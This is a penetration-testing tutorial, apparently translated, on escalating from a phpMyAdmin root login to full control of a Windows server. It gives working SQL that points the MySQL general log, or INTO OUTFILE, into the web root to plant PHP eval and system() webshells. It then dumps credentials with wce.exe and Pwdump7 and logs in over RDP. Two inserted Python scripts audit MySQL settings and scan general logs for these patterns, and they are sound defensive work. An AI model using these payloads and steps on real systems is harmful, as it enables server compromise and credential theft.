The following tutorial from the phpMyAdmin column covers phpMyAdmin privilege escalation. I hope it is helpful to those who need it!
Introduction: once you have learned a phpMyAdmin account password during a penetration test, how do you escalate privileges from it? Read on; today I will walk through phpMyAdmin privilege escalation.
0×00 Definition
phpMyAdmin is a web-based MySQL database management tool written in PHP and deployed on the website host, which lets administrators manage MySQL databases through a web interface.
0×01 Environment preparation
Target: Windows Server 2003 Enterprise x64 Edition, 192.168.17.137
Attacker: Windows 7, 192.168.17.132
PHP: 5.45
MySQL: 5.5.53
Apache: 2.4
0×02 Start penetration
Through weak passwords, brute forcing, directory leaks or other channels we have learned that the phpMyAdmin account password is root / root. Next we escalate privileges through phpMyAdmin, staying as close to a real engagement as possible, and discuss several ideas along the way.
a Collect useful information
As shown in the picture above, we can obtain the following useful information.
- 1. The operating system is Windows Server 2003 x86
- 2. The server is Apache 2.4.32
- 3. The default path of the website is E:\phpStudy\PHPTutorial\WWW
- 4. The PHP version is 5.45
- 5. The MySQL version is 5.5.53
b Detect insertion conditions
We learned above that the default website path is E:\phpstudy\PHPTutorial\WWW. At this point we naturally want to write a backdoor file or export a shell there. Either approach has a prerequisite: the value of secure_file_priv must not be empty and must be the default website path, so we must check the value of secure_file_priv in advance. Execute the following in phpMyAdmin:
SHOW VARIABLES LIKE 'secure_file_priv';
The result is shown in the figure:
From the figure above, the value is empty. If we import a one-liner now it will certainly fail. Don't believe it? Let's try.
Error: The MySQL server is running with the --secure-file-priv option so it cannot execute this statement. This is because MySQL restricts import and export through files, and disallows them by default: a default value of NULL means disabled, and if a directory is set, only files under that directory are allowed (subdirectories do not work either, as tested). Let's consider whether we can set its path to our default website path, so that we can import a one-liner backdoor. Let's try.
From the figure we learn that this variable is read-only and cannot be changed dynamically, so it can only be changed in the configuration file. At this point we find ourselves in a dead end: since the conventional way does not work, we can use a less conventional idea and insert the one-liner through the log file.
c Change of approach
First we need to check the values of the MySQL global variables general_log and general_log_file.
- general_log is the logging state; it has two values (ON/OFF): ON means enabled, OFF means disabled.
- general_log_file is the path where the log is saved.
From the figure, general_log is off by default, and the log is stored under E:\phpStudy\PHPTutorial\MySQL\data\.
First, let's understand what enabling general_log does: it records every command the user enters and saves it in a log file under E:\phpstudy\PHPTutorial\MySQL\data\, which is the log file we usually talk about. So our idea is: after enabling general_log, change general_log_file to a custom PHP file under the website's default path, then write a one-liner backdoor into it through the log, and then exploit it further.
The specific commands are:
set global general_log = "ON";
SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/infos.php';
Then we can see that the fake log file infos.php we generated appears in the website root directory.
Next we insert our one-liner backdoor.
select '';
We try connecting with Chopper (菜刀), and the connection succeeds.
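The two conditions this technique depends on (an unrestricted secure_file_priv in section b, and a general log that can be pointed at the web root in section c) are exactly what a defender should audit. The Python script below is an added example, not code from the original article: it parses the text that SHOW VARIABLES prints and returns a finding for each risky combination. The web-root path and the sample variable dump are constructed from the article's lab values, and the severity labels are this script's own. One caveat: MySQL treats NULL as "file import/export disabled" but the empty string as "unrestricted", and phpMyAdmin's variables page can render both as a blank cell, so confirm with SELECT @@global.secure_file_priv IS NULL before trusting a blank.

```python
"""Audit a MySQL server's file-export and general-log settings.

Added example, not code from the original article. It reads the text
that `SHOW VARIABLES` produces (tab-separated, as the mysql client
prints it) and flags the settings the article abuses: an unrestricted
secure_file_priv, and a general log redirected into the web root.
The sample output and the web-root path are constructed from the
article's lab values; the severity labels are this script's own.
"""
from pathlib import PureWindowsPath

# Constructed: what SHOW VARIABLES might print on the article's host after
# the general log has been redirected. NULL is printed literally by the
# mysql client; an empty Value column means the empty string.
SAMPLE_VARIABLES = """\
Variable_name\tValue
datadir\tE:\\phpStudy\\PHPTutorial\\MySQL\\data\\
general_log\tON
general_log_file\tE:/phpStudy/PHPTutorial/WWW/infos.php
secure_file_priv\t
"""

WEB_ROOT = r"E:\phpStudy\PHPTutorial\WWW"   # assumed document root (from the article)


def parse_show_variables(text):
    """Turn `Variable_name<TAB>Value` lines into a dict (header row skipped)."""
    rows = {}
    for line in text.splitlines():
        if "\t" not in line:
            continue
        name, value = line.split("\t", 1)
        if name.strip() != "Variable_name":
            rows[name.strip()] = value.strip()
    return rows


def is_within(path, root):
    """True if `path` equals `root` or lies below it (Windows, case-insensitive)."""
    p = [x.lower() for x in PureWindowsPath(path).parts]
    r = [x.lower() for x in PureWindowsPath(root).parts]
    return bool(r) and p[:len(r)] == r


def audit(variables, web_root=WEB_ROOT):
    """Return (severity, message) findings for one server's variables."""
    findings = []

    sfp = variables.get("secure_file_priv")
    if sfp is None or sfp.upper() == "NULL":
        pass  # file import/export disabled entirely: the safe setting
    elif sfp == "":
        findings.append(("HIGH", "secure_file_priv is the empty string: "
                         "LOAD DATA / SELECT ... INTO OUTFILE are unrestricted"))
    elif is_within(sfp, web_root) or is_within(web_root, sfp):
        findings.append(("HIGH", f"secure_file_priv={sfp!r} overlaps the web root: "
                         "INTO OUTFILE can create files the web server executes"))

    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append(("INFO", "general_log is ON: every statement text, "
                         "including anything an attacker submits, is written to disk"))

    glf = variables.get("general_log_file", "")
    datadir = variables.get("datadir", "")
    if glf and is_within(glf, web_root):
        findings.append(("CRITICAL", f"general_log_file={glf!r} is inside the web root: "
                         "logged SQL becomes a script the web server will run"))
    elif glf and datadir and not is_within(glf, datadir):
        findings.append(("HIGH", f"general_log_file={glf!r} has been moved out of datadir {datadir!r}"))

    return findings


if __name__ == "__main__":
    for severity, message in audit(parse_show_variables(SAMPLE_VARIABLES)):
        print(f"[{severity}] {message}")
```

Run against a real server by pasting the output of SHOW VARIABLES into parse_show_variables. The fixes the findings point at are the ones the article itself implies: set secure_file_priv to NULL (or to a directory the web server never serves), keep general_log_file inside datadir, and remove the SUPER privilege from the account phpMyAdmin uses, since SET GLOBAL is what makes the log redirection possible.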
d Get the administrator password
0×00 Get the plaintext directly
We upload wce.exe to obtain the plaintext password. With great luck, I got the plaintext directly (an 11-character password of mixed letters and digits). If you cannot get the plaintext directly, you have to go to the second step: get the hash value and then crack it.
0×01 Get the hash value
Upload Pwdump7.exe to obtain the hash values and save them in password.txt. Once you have the hashes, you can try cracking them online at http://www.objectif-securite.ch/en/ophcrack.php. If that fails, use Ophcrack with an imported rainbow table.
e Check whether 3389 is open
In the Chopper terminal, directly enter netstat -an | find "3389" or netstat -an.
We find that 3389 is not open but 3390 is, so let's try connecting to it.
f Log in to the server
Run mstsc to open the remote desktop.
Enter the account name and password obtained above, and the login succeeds.
Finally, traces must be cleaned up, but I won't write about that here; there is too much to cover.
0×03 Extension
The above demonstrates the case where secure_file_priv is empty; what should we do if secure_file_priv is not empty?
a Configure the my.ini file (not pointing at the website root)
Open the MySQL configuration file my.ini, set the value of secure_file_priv, and then restart MySQL.
secure_file_priv = "E:/phpStudy/PHPTutorial/MYSQL/"
Trying to change the value, we find it is read-only and not writable. In that case we cannot write our one-liner, because the export path is restricted and the one-liner cannot be written and then exported to the website root directory.
b Configure the my.ini file (pointing at the website root)
Open the MySQL configuration file my.ini, set the value of secure_file_priv, and then restart MySQL.
secure_file_priv = "E:/phpStudy/PHPTutorial/WWW/"
Then we try to insert the one-liner backdoor, and it is inserted successfully.
Connect with Chopper without further ado.
Of course, the one-liner can also be inserted this way:
CREATE TABLE `mysql`.`informationes` (`inform` TEXT NOT NULL);
INSERT INTO `mysql`.`informationes` (`inform`) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `inform` from `mysql`.`informationes` into outfile 'e:/phpStudy/PHPTutorial/WWW/infos.php';
DROP table if exists `mysql`.`informationes`;
(Note: c:/phpStudy/PHPTutorial/WWW/ is the absolute path of the website)
c Export a PHP file that gives a shell with command execution
select '\';system($_POST[\'yumu\']);echo \'\';?>' into outfile 'c:/phpStudy/PHPTutorial/WWW/test.php';
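Every statement in this section, and the general_log redirection from section c, leaves a record in the server's own general log, which makes the general log a good detection source. The Python scanner below is an added example, not code from the original article: it reads general-log lines in the MySQL 5.x text layout and flags three things the article relies on, a SET of general_log_file, an INTO OUTFILE / DUMPFILE whose target lies under the web root, and PHP or command-execution fragments inside statement text. The log excerpt, the web-root path and the rule names are constructed for this example; the middle lines of the excerpt replay the article's own statements.

```python
"""Detect log-file and INTO OUTFILE webshell drops in the MySQL general log.

Added example, not from the original article. Reads general-log lines in
the MySQL 5.x text format (time, thread id, command, argument) and flags
the patterns the article's technique produces. Log lines are constructed.
"""
import re
from pathlib import PureWindowsPath

# Assumed document root (taken from the article's lab), compared case-insensitively.
WEB_ROOT_PARTS = [p.lower() for p in PureWindowsPath(r"E:\phpStudy\PHPTutorial\WWW").parts]

# Constructed sample excerpt. Lines 2-4 replay the article's statements;
# line 5 is a benign export into the MySQL data directory.
SAMPLE_LOG = """\
170315 10:22:01\t    3 Query\tSHOW VARIABLES LIKE 'secure_file_priv'
170315 10:22:40\t    3 Query\tSET global general_log_file='E:/phpStudy/PHPTutorial/WWW/infos.php'
170315 10:23:02\t    3 Query\tselect '<?php @eval($_POST[pass]);?>'
170315 10:23:30\t    3 Query\tSELECT `inform` from `mysql`.`informationes` into outfile 'e:/phpStudy/PHPTutorial/WWW/infos.php'
170315 10:24:10\t    4 Query\tSELECT name FROM users INTO OUTFILE 'E:/phpStudy/PHPTutorial/MySQL/data/export.txt'
170315 10:25:00\t    4 Quit\t
"""

# Optional timestamp, thread id, command word, then the argument text.
LOG_LINE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+(\w+)\s*(.*)$")

RULES = [
    ("general_log_file redirected",
     re.compile(r"\bSET\s+(?:GLOBAL\s+)?general_log_file\b", re.I)),
    ("script payload in statement",
     re.compile(r"<\?(?:php|=)|\beval\s*\(|\bsystem\s*\(|\$_(?:POST|GET|REQUEST)\[", re.I)),
]
OUTFILE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']+)'", re.I)


def under_web_root(path):
    """True if a Windows path (either slash style) is at or below the web root."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return parts[:len(WEB_ROOT_PARTS)] == WEB_ROOT_PARTS


def statements(log_text):
    """Yield (line_no, statement) for every Query entry; other commands are skipped."""
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_LINE.match(line)
        if m and m.group(2).lower() == "query":
            yield n, m.group(3).strip()


def scan_general_log(log_text):
    """Return (line_no, rule_name, statement) for every suspicious statement."""
    hits = []
    for n, stmt in statements(log_text):
        for name, pattern in RULES:
            if pattern.search(stmt):
                hits.append((n, name, stmt))
        m = OUTFILE.search(stmt)
        if m and under_web_root(m.group(1)):
            hits.append((n, "INTO OUTFILE into web root", stmt))
    return hits


if __name__ == "__main__":
    for line_no, rule, stmt in scan_general_log(SAMPLE_LOG):
        print(f"line {line_no}: {rule}: {stmt}")
```

Two design points: the export rule keys on the destination path rather than on the INTO OUTFILE keyword alone, so routine exports into the data directory stay quiet; and the payload rule is deliberately narrow (PHP open tags, eval/system calls, superglobal access), which catches the article's one-liners without firing on ordinary string literals. Since the log redirection in section c also swallows the very statements that would expose it once the log moves, the most reliable copy of this evidence is a general log shipped off-host, or the web server's access log showing requests to a newly created .php file.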
0×04 Summary
Apart from having no WAF, the environment in this article is as close to a real one as possible; it simulates the real situation so that everyone can analyze and follow the ideas. I hope everyone gains something from it.